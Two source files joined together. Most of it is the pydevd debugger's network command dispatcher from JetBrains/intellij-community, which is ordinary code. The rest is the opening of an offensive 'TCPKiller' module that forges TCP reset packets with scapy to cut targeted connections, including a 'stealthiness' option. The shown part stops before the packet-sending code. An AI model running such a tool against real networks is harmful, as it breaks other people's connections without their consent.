if internal_get_thread_stack.can_be_executed_by(get_current_thread_id(threading.current_thread())):
internal_get_thread_stack.do_it(py_db)
else:
py_db.post_internal_command(internal_get_thread_stack, '*')
elif cmd_id == CMD_THREAD_SUSPEND:
# Yes, thread suspend is done at this point, not through an internal command.
threads = []
suspend_all = text.strip() == '*'
if suspend_all:
threads = pydevd_utils.get_non_pydevd_threads()
elif text.startswith('__frame__:'):
sys.stderr.write("Can't suspend tasklet: %s\n" % (text,))
else:
threads = [pydevd_find_thread_by_id(text)]
for t in threads:
if t is None:
continue
py_db.set_suspend(
t,
CMD_THREAD_SUSPEND,
suspend_other_threads=suspend_all,
is_pause=True,
)
# Break here (even if it's suspend all) as py_db.set_suspend will
# take care of suspending other threads.
break
elif cmd_id == CMD_THREAD_RUN:
threads = []
if text.strip() == '*':
threads = pydevd_utils.get_non_pydevd_threads()
elif text.startswith('__frame__:'):
sys.stderr.write("Can't make tasklet run: %s\n" % (text,))
else:
threads = [pydevd_find_thread_by_id(text)]
for t in threads:
if t is None:
continue
additional_info = set_additional_thread_info(t)
additional_info.pydev_step_cmd = -1
additional_info.pydev_step_stop = None
additional_info.pydev_state = STATE_RUN
elif cmd_id == CMD_STEP_INTO or cmd_id == CMD_STEP_OVER or cmd_id == CMD_STEP_RETURN or \
cmd_id == CMD_STEP_INTO_MY_CODE:
# we received some command to make a single step
t = pydevd_find_thread_by_id(text)
if t:
thread_id = get_thread_id(t)
int_cmd = InternalStepThread(thread_id, cmd_id)
py_db.post_internal_command(int_cmd, thread_id)
elif text.startswith('__frame__:'):
sys.stderr.write("Can't make tasklet step command: %s\n" % (text,))
elif cmd_id in (CMD_RUN_TO_LINE, CMD_SET_NEXT_STATEMENT, CMD_SMART_STEP_INTO):
if cmd_id == CMD_SMART_STEP_INTO:
# we received a smart step into command
thread_id, frame_id, line, func_name, call_order, start_line, end_line = text.split('\t', 6)
else:
# we received some command to make a single step
thread_id, line, func_name = text.split('\t', 2)
if func_name == "None":
# global context
func_name = ''
t = pydevd_find_thread_by_id(thread_id)
if t:
if cmd_id == CMD_SMART_STEP_INTO:
int_cmd = InternalSmartStepInto(thread_id, frame_id, cmd_id, func_name, line, call_order, start_line, end_line, seq)
else:
int_cmd = InternalSetNextStatementThread(thread_id, cmd_id, line, func_name, seq)
py_db.post_internal_command(int_cmd, thread_id)
elif thread_id.startswith('__frame__:'):
sys.stderr.write("Can't set next statement in tasklet: %s\n" % (thread_id,))
elif cmd_id == CMD_RELOAD_CODE:
# we received some command to make a reload of a module
module_name = text.strip()
thread_id = '*' # Any thread
# Note: not going for the main thread because in this case it'd only do the load
# when we stopped on a breakpoint.
int_cmd = ReloadCodeCommand(module_name, thread_id)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_CHANGE_VARIABLE:
# the text is: thread\tstackframe\tFRAME|GLOBAL\tattribute_to_change\tvalue_to_change
try:
thread_id, frame_id, scope, attr_and_value = text.split('\t', 3)
tab_index = attr_and_value.rindex('\t')
attr = attr_and_value[0:tab_index].replace('\t', '.')
value = attr_and_value[tab_index + 1:]
int_cmd = InternalChangeVariable(seq, thread_id, frame_id, scope, attr, value)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_VARIABLE:
# we received some command to get a variable
# the text is: thread_id\tframe_id\tFRAME|GLOBAL\tattributes*
try:
thread_id, frame_id, scopeattrs = text.split('\t', 2)
if scopeattrs.find('\t') != -1: # there are attributes beyond scope
scope, _, attrs = scopeattrs.split('\t', 2)
else:
scope, attrs = (scopeattrs, None)
int_cmd = InternalGetVariable(seq, thread_id, frame_id, scope, attrs)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_ARRAY:
# we received some command to get an array variable
# the text is: thread_id\tframe_id\tFRAME|GLOBAL\tname\ttemp\troffs\tcoffs\trows\tcols\tformat
try:
roffset, coffset, rows, cols, format, thread_id, frame_id, scopeattrs = text.split('\t', 7)
if scopeattrs.find('\t') != -1: # there are attributes beyond scope
scope, _, attrs = scopeattrs.split('\t', 2)
else:
scope, attrs = (scopeattrs, None)
int_cmd = InternalGetArray(seq, roffset, coffset, rows, cols, format, thread_id, frame_id, scope, attrs)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_SHOW_RETURN_VALUES:
try:
show_return_values = text.split('\t')[1]
if int(show_return_values) == 1:
py_db.show_return_values = True
else:
if py_db.show_return_values:
# We should remove saved return values
py_db.remove_return_values_flag = True
py_db.show_return_values = False
pydev_log.debug("Show return values: %s\n" % py_db.show_return_values)
except:
traceback.print_exc()
elif cmd_id == CMD_SET_UNIT_TEST_DEBUGGING_MODE:
py_db.set_unit_tests_debugging_mode()
elif cmd_id == CMD_LOAD_FULL_VALUE:
try:
thread_id, frame_id, scopeattrs = text.split('\t', 2)
vars = scopeattrs.split(NEXT_VALUE_SEPARATOR)
int_cmd = InternalLoadFullValue(seq, thread_id, frame_id, vars)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_COMPLETIONS:
# we received some command to get a variable
# the text is: thread_id\tframe_id\tactivation token
try:
thread_id, frame_id, scope, act_tok = text.split('\t', 3)
int_cmd = InternalGetCompletions(seq, thread_id, frame_id, act_tok)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_DESCRIPTION:
try:
thread_id, frame_id, expression = text.split('\t', 2)
int_cmd = InternalGetDescription(seq, thread_id, frame_id, expression)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_FRAME:
thread_id, frame_id, scope, group_type = text.split('\t', 3)
int_cmd = InternalGetFrame(seq, thread_id, frame_id, int(group_type))
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_SET_BREAK:
# func name: 'None': match anything. Empty: match global, specified: only method context.
# command to add some breakpoint.
# text is file\tline. Add to breakpoints dictionary
suspend_policy = "NONE" # Can be 'NONE' or 'ALL'
is_logpoint = False
hit_condition = None
if py_db._set_breakpoints_with_id:
try:
try:
breakpoint_id, type, file, line, func_name, condition, expression, hit_condition, is_logpoint, suspend_policy = text.split('\t', 9)
except ValueError: # not enough values to unpack
# No suspend_policy passed (use default).
breakpoint_id, type, file, line, func_name, condition, expression, hit_condition, is_logpoint = text.split('\t', 8)
is_logpoint = is_logpoint == 'True'
except ValueError: # not enough values to unpack
breakpoint_id, type, file, line, func_name, condition, expression = text.split('\t', 6)
breakpoint_id = int(breakpoint_id)
line = int(line)
# We must restore new lines and tabs as done in
# AbstractDebugTarget.breakpointAdded
condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
else:
# Note: this else should be removed after PyCharm migrates to setting
# breakpoints by id (and ideally also provides func_name).
type, file, line, func_name, suspend_policy, condition, expression = text.split('\t', 6)
# If we don't have an id given for each breakpoint, consider
# the id to be the line.
breakpoint_id = line = int(line)
condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
file = file.encode(file_system_encoding)
if pydevd_file_utils.is_real_file(file):
file = pydevd_file_utils.norm_file_to_server(file)
if not pydevd_file_utils.exists(file):
sys.stderr.write('pydev debugger: warning: trying to add breakpoint'
' to file that does not exist: %s (will have no effect)\n' % (file,))
sys.stderr.flush()
if condition is not None and (len(condition) <= 0 or condition == "None"):
condition = None
if expression is not None and (len(expression) <= 0 or expression == "None"):
expression = None
if hit_condition is not None and (len(hit_condition) <= 0 or hit_condition == "None"):
hit_condition = None
if type == 'python-line':
breakpoint = LineBreakpoint(line, condition, func_name, expression, suspend_policy, hit_condition=hit_condition, is_logpoint=is_logpoint)
breakpoints = py_db.breakpoints
file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
supported_type = True
else:
result = None
plugin = py_db.get_plugin_lazy_init()
if plugin is not None:
result = plugin.add_breakpoint('add_line_breakpoint', py_db, type, file, line, condition, expression, func_name, hit_condition=hit_condition, is_logpoint=is_logpoint)
if result is not None:
supported_type = True
breakpoint, breakpoints = result
file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
else:
supported_type = False
if not supported_type:
if type == 'jupyter-line':
return
else:
raise NameError(type)
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.debug('Added breakpoint:%s - line:%s - func_name:%s\n' % (file, line, func_name.encode('utf-8')))
sys.stderr.flush()
if file in file_to_id_to_breakpoint:
id_to_pybreakpoint = file_to_id_to_breakpoint[file]
else:
id_to_pybreakpoint = file_to_id_to_breakpoint[file] = {}
id_to_pybreakpoint[breakpoint_id] = breakpoint
py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
if py_db.plugin is not None:
py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()
if py_db.has_plugin_line_breaks:
py_db.frame_eval_func = None
py_db.on_breakpoints_changed()
elif cmd_id == CMD_REMOVE_BREAK:
#command to remove some breakpoint
#text is type\file\tid. Remove from breakpoints dictionary
breakpoint_type, file, breakpoint_id = text.split('\t', 2)
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
file = file.encode(file_system_encoding)
if pydevd_file_utils.is_real_file(file):
file = pydevd_file_utils.norm_file_to_server(file)
try:
breakpoint_id = int(breakpoint_id)
except ValueError:
pydev_log.error('Error removing breakpoint. Expected breakpoint_id to be an int. Found: %s' % (breakpoint_id,))
else:
file_to_id_to_breakpoint = None
if breakpoint_type == 'python-line':
breakpoints = py_db.breakpoints
file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
elif py_db.get_plugin_lazy_init() is not None:
result = py_db.plugin.get_breakpoints(py_db, breakpoint_type)
if result is not None:
file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
breakpoints = result
if file_to_id_to_breakpoint is None:
pydev_log.error('Error removing breakpoint. Cant handle breakpoint of type %s' % breakpoint_type)
else:
try:
id_to_pybreakpoint = file_to_id_to_breakpoint.get(file, {})
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
existing = id_to_pybreakpoint[breakpoint_id]
sys.stderr.write('Removed breakpoint:%s - line:%s - func_name:%s (id: %s)\n' % (
file, existing.line, existing.func_name.encode('utf-8'), breakpoint_id))
del id_to_pybreakpoint[breakpoint_id]
py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
if py_db.plugin is not None:
py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()
except KeyError:
pydev_log.error("Error removing breakpoint: Breakpoint id not found: %s id: %s. Available ids: %s\n" % (
file, breakpoint_id, dict_keys(id_to_pybreakpoint)))
py_db.on_breakpoints_changed(removed=True)
elif cmd_id == CMD_EVALUATE_EXPRESSION or cmd_id == CMD_EXEC_EXPRESSION:
#command to evaluate the given expression
#text is: thread\tstackframe\tLOCAL\texpression
temp_name = ""
try:
thread_id, frame_id, scope, expression, trim, temp_name = text.split('\t', 5)
except ValueError:
thread_id, frame_id, scope, expression, trim = text.split('\t', 4)
int_cmd = InternalEvaluateExpression(seq, thread_id, frame_id, expression,
cmd_id == CMD_EXEC_EXPRESSION, int(trim) == 1, temp_name)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_CONSOLE_EXEC:
#command to exec expression in console, in case expression is only partially valid 'False' is returned
#text is: thread\tstackframe\tLOCAL\texpression
thread_id, frame_id, scope, expression = text.split('\t', 3)
int_cmd = InternalConsoleExec(seq, thread_id, frame_id, expression)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_SET_PY_EXCEPTION:
# Command which receives set of exceptions on which user wants to break the debugger
# text is:
#
# break_on_uncaught;
# break_on_caught;
# skip_on_exceptions_thrown_in_same_context;
# ignore_exceptions_thrown_in_lines_with_ignore_exception;
# ignore_libraries;
# TypeError;ImportError;zipimport.ZipImportError;
#
# i.e.: true;true;true;true;true;TypeError;ImportError;zipimport.ZipImportError;
#
# This API is optional and works 'in bulk' -- it's possible
# to get finer-grained control with CMD_ADD_EXCEPTION_BREAK/CMD_REMOVE_EXCEPTION_BREAK
# which allows setting caught/uncaught per exception.
splitted = text.split(';')
py_db.break_on_uncaught_exceptions = {}
py_db.break_on_caught_exceptions = {}
if len(splitted) >= 5:
if splitted[0] == 'true':
break_on_uncaught = True
else:
break_on_uncaught = False
if splitted[1] == 'true':
break_on_caught = True
else:
break_on_caught = False
if splitted[2] == 'true':
py_db.skip_on_exceptions_thrown_in_same_context = True
else:
py_db.skip_on_exceptions_thrown_in_same_context = False
if splitted[3] == 'true':
py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = True
else:
py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = False
if splitted[4] == 'true':
ignore_libraries = True
else:
ignore_libraries = False
for exception_type in splitted[5:]:
exception_type = exception_type.strip()
if not exception_type:
continue
exception_breakpoint = py_db.add_break_on_exception(
exception_type,
condition=None,
expression=None,
notify_on_handled_exceptions=break_on_caught,
notify_on_unhandled_exceptions=break_on_uncaught,
notify_on_first_raise_only=True,
ignore_libraries=ignore_libraries,
)
py_db.on_breakpoints_changed()
else:
sys.stderr.write("Error when setting exception list. Received: %s\n" % (text,))
elif cmd_id == CMD_GET_FILE_CONTENTS:
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
text = text.encode(file_system_encoding)
if os.path.exists(text):
f = open(text, 'r')
try:
source = f.read()
finally:
f.close()
cmd = py_db.cmd_factory.make_get_file_contents(seq, source)
elif cmd_id == CMD_SET_PROPERTY_TRACE:
# Command which receives whether to trace property getter/setter/deleter
# text is feature_state(true/false);disable_getter/disable_setter/disable_deleter
if text != "":
splitted = text.split(';')
if len(splitted) >= 3:
if py_db.disable_property_trace is False and splitted[0] == 'true':
# Replacing property by custom property only when the debugger starts
pydevd_traceproperty.replace_builtin_property()
py_db.disable_property_trace = True
# Enable/Disable tracing of the property getter
if splitted[1] == 'true':
py_db.disable_property_getter_trace = True
else:
py_db.disable_property_getter_trace = False
# Enable/Disable tracing of the property setter
if splitted[2] == 'true':
py_db.disable_property_setter_trace = True
else:
py_db.disable_property_setter_trace = False
# Enable/Disable tracing of the property deleter
if splitted[3] == 'true':
py_db.disable_property_deleter_trace = True
else:
py_db.disable_property_deleter_trace = False
else:
# User hasn't configured any settings for property tracing
pass
elif cmd_id == CMD_ADD_EXCEPTION_BREAK:
# Note that this message has some idiosyncrasies...
#
# notify_on_handled_exceptions can be 0, 1 or 2
# 0 means we should not stop on handled exceptions.
# 1 means we should stop on handled exceptions showing it on all frames where the exception passes.
# 2 means we should stop on handled exceptions but we should only notify about it once.
#
# To ignore_libraries properly, besides setting ignore_libraries to 1, the IDE_PROJECT_ROOTS environment
# variable must be set (so, we'll ignore anything not below IDE_PROJECT_ROOTS) -- this is not ideal as
# the environment variable may not be properly set if it didn't start from the debugger (we should
# create a custom message for that).
#
# There are 2 global settings which can only be set in CMD_SET_PY_EXCEPTION. Namely:
#
# py_db.skip_on_exceptions_thrown_in_same_context
# - If True, we should only show the exception in a caller, not where it was first raised.
#
# py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception
# - If True exceptions thrown in lines with '@IgnoreException' will not be shown.
condition = ""
expression = ""
if text.find('\t') != -1:
try:
exception, condition, expression, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries = text.split('\t', 5)
except:
exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries = text.split('\t', 3)
else:
exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries = text, 0, 0, 0
condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n').replace("@_@TAB_CHAR@_@", '\t').strip()
if condition is not None and (len(condition) == 0 or condition == "None"):
condition = None
expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n').replace("@_@TAB_CHAR@_@", '\t').strip()
if expression is not None and (len(expression) == 0 or expression == "None"):
expression = None
if exception.find('-') != -1:
breakpoint_type, exception = exception.split('-')
else:
breakpoint_type = 'python'
if breakpoint_type == 'python':
exception_breakpoint = py_db.add_break_on_exception(
exception,
condition=condition,
expression=expression,
notify_on_handled_exceptions=int(notify_on_handled_exceptions) > 0,
notify_on_unhandled_exceptions=int(notify_on_unhandled_exceptions) == 1,
notify_on_first_raise_only=int(notify_on_handled_exceptions) == 2,
ignore_libraries=int(ignore_libraries) > 0
)
if exception_breakpoint is not None:
py_db.on_breakpoints_changed()
else:
supported_type = False
plugin = py_db.get_plugin_lazy_init()
if plugin is not None:
supported_type = plugin.add_breakpoint('add_exception_breakpoint', py_db, breakpoint_type, exception)
if supported_type:
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
py_db.on_breakpoints_changed()
elif cmd_id == CMD_REMOVE_EXCEPTION_BREAK:
exception = text
if exception.find('-') != -1:
exception_type, exception = exception.split('-')
else:
exception_type = 'python'
if exception_type == 'python':
try:
cp = py_db.break_on_uncaught_exceptions.copy()
cp.pop(exception, None)
py_db.break_on_uncaught_exceptions = cp
cp = py_db.break_on_caught_exceptions.copy()
cp.pop(exception, None)
py_db.break_on_caught_exceptions = cp
except:
pydev_log.debug("Error while removing exception %s"%sys.exc_info()[0])
else:
supported_type = False
# I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
# anything from it anyways).
plugin = py_db.plugin
if plugin is not None:
supported_type = plugin.remove_exception_breakpoint(py_db, exception_type, exception)
if supported_type:
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
else:
raise NameError(exception_type)
py_db.on_breakpoints_changed(removed=True)
elif cmd_id == CMD_LOAD_SOURCE:
path = text
try:
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
path = path.encode(file_system_encoding)
path = pydevd_file_utils.norm_file_to_server(path)
f = open(path, 'r')
source = f.read()
cmd = py_db.cmd_factory.make_load_source_message(seq, source)
except:
cmd = py_db.cmd_factory.make_error_message(seq, pydevd_tracing.get_exception_traceback_str())
elif cmd_id == CMD_ADD_DJANGO_EXCEPTION_BREAK:
exception = text
plugin = py_db.get_plugin_lazy_init()
if plugin is not None:
plugin.add_breakpoint('add_exception_breakpoint', py_db, 'django', exception)
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
py_db.on_breakpoints_changed()
elif cmd_id == CMD_REMOVE_DJANGO_EXCEPTION_BREAK:
exception = text
# I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
# anything from it anyways).
plugin = py_db.plugin
if plugin is not None:
plugin.remove_exception_breakpoint(py_db, 'django', exception)
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
py_db.on_breakpoints_changed(removed=True)
elif cmd_id == CMD_EVALUATE_CONSOLE_EXPRESSION:
# Command which takes care for the debug console communication
if text != "":
thread_id, frame_id, console_command = text.split('\t', 2)
console_command, line = console_command.split('\t')
if console_command == 'EVALUATE':
int_cmd = InternalEvaluateConsoleExpression(
seq, thread_id, frame_id, line, buffer_output=True)
elif console_command == 'EVALUATE_UNBUFFERED':
int_cmd = InternalEvaluateConsoleExpression(
seq, thread_id, frame_id, line, buffer_output=False)
elif console_command == 'GET_COMPLETIONS':
int_cmd = InternalConsoleGetCompletions(seq, thread_id, frame_id, line)
else:
raise ValueError('Unrecognized command: %s' % (console_command,))
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_RUN_CUSTOM_OPERATION:
# Command which runs a custom operation
if text != "":
try:
location, custom = text.split('||', 1)
except:
sys.stderr.write('Custom operation now needs a || separator. Found: %s\n' % (text,))
raise
thread_id, frame_id, scopeattrs = location.split('\t', 2)
if scopeattrs.find('\t') != -1: # there are attributes beyond scope
scope, attrs = scopeattrs.split('\t', 1)
else:
scope, attrs = (scopeattrs, None)
# : style: EXECFILE or EXEC
# : encoded_code_or_file: file to execute or code
# : fname: name of function to be executed in the resulting namespace
style, encoded_code_or_file, fnname = custom.split('\t', 3)
int_cmd = InternalRunCustomOperation(seq, thread_id, frame_id, scope, attrs,
style, encoded_code_or_file, fnname)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_IGNORE_THROWN_EXCEPTION_AT:
if text:
replace = 'REPLACE:' # Not all 3.x versions support u'REPLACE:', so, doing workaround.
if not IS_PY3K:
replace = unicode(replace)
if text.startswith(replace):
text = text[8:]
py_db.filename_to_lines_where_exceptions_are_ignored.clear()
if text:
for line in text.split('||'): # Can be bulk-created (one in each line)
filename, line_number = line.split('|')
if not IS_PY3K:
filename = filename.encode(file_system_encoding)
filename = pydevd_file_utils.norm_file_to_server(filename)
if os.path.exists(filename):
lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored.get(filename)
if lines_ignored is None:
lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored[filename] = {}
lines_ignored[int(line_number)] = 1
else:
sys.stderr.write('pydev debugger: warning: trying to ignore exception thrown'
' on file that does not exist: %s (will have no effect)\n' % (filename,))
elif cmd_id == CMD_ENABLE_DONT_TRACE:
if text:
true_str = 'true' # Not all 3.x versions support u'str', so, doing workaround.
if not IS_PY3K:
true_str = unicode(true_str)
mode = text.strip() == true_str
pydevd_dont_trace.trace_filter(mode)
elif cmd_id == CMD_PROCESS_CREATED_MSG_RECEIVED:
original_seq = int(text)
event = py_db.process_created_msg_received_events.pop(original_seq, None)
if event:
event.set()
elif cmd_id == CMD_REDIRECT_OUTPUT:
if text:
py_db.enable_output_redirection('STDOUT' in text, 'STDERR' in text)
elif cmd_id == CMD_GET_NEXT_STATEMENT_TARGETS:
thread_id, frame_id = text.split('\t', 1)
int_cmd = InternalGetNextStatementTargets(seq, thread_id, frame_id)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_SET_PROJECT_ROOTS:
pydevd_utils.set_project_roots(text.split(u'\t'))
elif cmd_id == CMD_THREAD_DUMP_TO_STDERR:
pydevd_utils.dump_threads()
elif cmd_id == CMD_STOP_ON_START:
py_db.stop_on_start = text.strip() in ('True', 'true', '1')
elif cmd_id == CMD_PYDEVD_JSON_CONFIG:
# Expected to receive a json string as:
# {
# 'skip_suspend_on_breakpoint_exception': [<exception names where we should suspend>],
# 'skip_print_breakpoint_exception': [<exception names where we should print>],
# 'multi_threads_single_notification': bool,
# }
msg = json.loads(text.strip())
if 'skip_suspend_on_breakpoint_exception' in msg:
py_db.skip_suspend_on_breakpoint_exception = tuple(
get_exception_class(x) for x in msg['skip_suspend_on_breakpoint_exception'])
if 'skip_print_breakpoint_exception' in msg:
py_db.skip_print_breakpoint_exception = tuple(
get_exception_class(x) for x in msg['skip_print_breakpoint_exception'])
if 'multi_threads_single_notification' in msg:
py_db.multi_threads_single_notification = msg['multi_threads_single_notification']
elif cmd_id == CMD_GET_EXCEPTION_DETAILS:
thread_id = text
t = pydevd_find_thread_by_id(thread_id)
frame = None
if t and not getattr(t, 'pydev_do_not_trace', None):
additional_info = set_additional_thread_info(t)
frame = additional_info.get_topmost_frame(t)
try:
cmd = py_db.cmd_factory.make_get_exception_details_message(seq, thread_id, frame)
finally:
frame = None
t = None
elif cmd_id == CMD_GET_SMART_STEP_INTO_VARIANTS:
thread_id, frame_id, start_line, end_line = text.split('\t', 3)
int_cmd = InternalGetSmartStepIntoVariants(seq, thread_id, frame_id, start_line, end_line)
py_db.post_internal_command(int_cmd, thread_id)
# Powerful DataViewer commands
elif cmd_id == CMD_DATAVIEWER_ACTION:
# format: thread_id frame_id name temp
try:
thread_id, frame_id, var, action, args = text.split('\t', 4)
args = args.split('\t')
int_cmd = InternalDataViewerAction(seq, thread_id, frame_id, var, action, args)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_TABLE_EXEC:
try:
thread_id, frame_id, init_command, command_type = text.split('\t', 3)
int_cmd = InternalTableCommand(seq, thread_id, frame_id, init_command, command_type)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_SET_USER_TYPE_RENDERERS:
try:
type_renderers = parse_set_type_renderers_message(text)
py_db.set_user_type_renderers(type_renderers)
except:
traceback.print_exc()
else:
#I have no idea what this is all about
cmd = py_db.cmd_factory.make_error_message(seq, "unexpected command " + str(cmd_id))
if cmd is not None:
py_db.writer.add_command(cmd)
del cmd
except Exception:
traceback.print_exc()
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
stream = StringIO()
traceback.print_exc(file=stream)
cmd = py_db.cmd_factory.make_error_message(
seq,
"Unexpected exception in process_net_command.\nInitial params: %s. Exception: %s" % (
((cmd_id, seq, text), stream.getvalue())
)
)
py_db.writer.add_command(cmd)
finally:
py_db._main_lock.release()
| {
"content_hash": "e61e4e6e4cf22ac33be6d1035081afb0",
"timestamp": "",
"source": "github",
"line_count": 929,
"max_line_length": 190,
"avg_line_length": 50.70398277717976,
"alnum_prop": 0.5211234714673914,
"repo_name": "JetBrains/intellij-community",
"id": "9fbdedaee9ec005135d1b1687fa5c53d4d65518d",
"size": "47104",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "python/helpers/pydev/_pydevd_bundle/pydevd_process_net_command.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import binascii
import socket
import struct
import argparse
import sys
import logging
import os
import traceback
import socket
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import Ether, IP, IPv6, TCP, sendp, conf, sniff
from random import randint
from capability import *
from colorama import *
from interface import *
def args_error():
print BAD + "Invalid parameters."
def validate_ips(ips):
clean = []
if ips is None or not isinstance(ips, list):
return []
for ip in ips:
if "," in ip:
ips += filter(None, ip.split(","))
else:
try:
socket.inet_aton(ip)
except Exception as e:
print e
print("error: invalid ip address \"%s\", exiting." % ip)
return None
clean.append(ip)
return clean
def is_int(s):
try:
int(s)
return True
except ValueError:
return False
def validate_ports(ports):
clean = []
if ports is not None:
for port in ports:
if "," in port:
ports += port.split(",")
elif "-" in port:
low, high = port.split("-")
if not is_int(low) or not is_int(high):
print("error: invalid port range \"%s\", exiting." % port)
return None
elif not is_int(port):
return None
clean.append(port)
return clean
return []
def validate_args(args):
for arg in ["allow", "allow_source", "allow_destination", "target", "target_source", "target_destination"]:
if arg in args and args[arg] is not None and not validate_ips(args[arg]):
args_error()
for arg in ["allow_port", "allow_source_port", "allow_destination_port", "target_port", "target_source_port", "target_destination_port"]:
if arg in args and args[arg] is not None and not validate_ports(args[arg]):
args_error()
class TCPKiller(Capability):
def __init__(self, core):
super(TCPKiller, self).__init__(core)
self.name = "TCPKiller"
self.core = core
self.options = {
"interface": Option("interface", "eth0", "interface to act upon", True),
"allow": Option("allow", self.core.localIP, "do not attack this ip address's connections, whether it's the source or destination of a packet", False),
"allow_source": Option("allow-source", False, "do not attack this ip address's connections, but only if it's the source of a packet", False),
"allow_destination": Option("destination-source", False, "do not attack this ip address's connections, but only if it's the destination of a packet", False),
"target": Option("target", "0.0.0.0", "actively target given ip address, whether it is the source or destination of a packet", False),
"target_source": Option("target-source", "0.0.0.0", "actively target this ip address, but only if it's the source of a packet", False),
"target_destination": Option("target-destination", "0.0.0.0", "actively target this ip address, but only if it's the destination of a packet", False),
"allow_port": Option("allow-port", None, "do not attack any connections involving this port, whether it's the source or destination of a packet", False),
"allow_source_port": Option("allow-source-port", None, "do not attack any connections involving this port, but only if it's the source of a packet", False),
"allow_destination_port": Option("allow-source-port", None, "do not attack any connections involving this port, but only if it's the destination of a packet", False),
"target_port": Option("target-port", None, "actively target any connections involving these ports whether it is the source or destination of a packet", False),
"target_source_port": Option("target-source-port", None, "actively target any connections involving this port, but only if it's the source", False),
"target_destination_port": Option("target-source-port", None, "actively target any connections involving this port, but only if it's the destination", False),
"noisy": Option("noisy", False, "sends many more packets to attempt connection resets to increase effectiveness", False),
"randomize": Option("randomize", "all", "target only SOME of the matching packets for increased stealthiness", False),
"verbose": Option("verbose", "True", "verbose output", False)
}
self.help_text = INFO + "Forges TCP reset packets to hangup all ipv4 tcp connections"
def setup(self):
args = {}
for opt in self.options:
args[opt] = self.get_value(opt)
self.iface = args["interface"]
self.verbose = args["verbose"]
self.noisy = args["noisy"]
self.randomize = args["randomize"]
self.VERBOSE = False
self.allow = self.allow_source = self.allow_destination = []
self.target = self.target_source = self.target_destination = []
self.aports = self.allow_sport = self.allow_dport = []
self.tports = self.target_sport = self.target_dport = []
self.ranges = {}
self.allow = validate_ips(args["allow"])
self.allow_src = validate_ips(args["allow_source"])
self.allow_dst = validate_ips(args["allow_destination"])
self.target = validate_ips(args["target"])
self.target_src = validate_ips(args["target_source"])
self.target_dst = validate_ips(args["target_destination"])
self.allow_ports = validate_ports(args["allow_port"])
self.allow_sport = validate_ports(args["allow_source_port"])
self.allow_dport = validate_ports(args["allow_destination_port"])
self.target_ports = validate_ports(args["target_port"])
self.target_sport = validate_ports(args["target_source_port"])
self.target_dport = validate_ports(args["target_destination_port"])
self.args = args
self.stop_sniffing = False
try:
self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
except:
print BAD + "Raw sockets are unavailable on this platform. Exiting."
return None
